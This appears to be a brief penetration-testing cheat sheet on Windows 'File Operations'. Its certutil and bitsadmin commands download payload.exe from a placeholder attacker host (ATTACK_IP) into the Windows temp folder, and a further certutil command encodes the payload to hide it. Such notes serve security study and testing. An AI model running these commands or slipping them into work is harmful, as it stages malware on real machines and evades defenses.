File Operations
Tools: CertUtil, BITSAdmin, Findstr
Examples:
CERTUTIL
certutil -URLcache -split -f http://ATTACK_IP/payload.exe c:\windows\temp\payload.execertutil -encode payload.exe Encoded-payload.txtBITSADMIN
bitsadmin.exe /transfer /Download /priority Foreground http://ATTACK_IP/payload.exe c:\windows\temp\payload.exeLast updated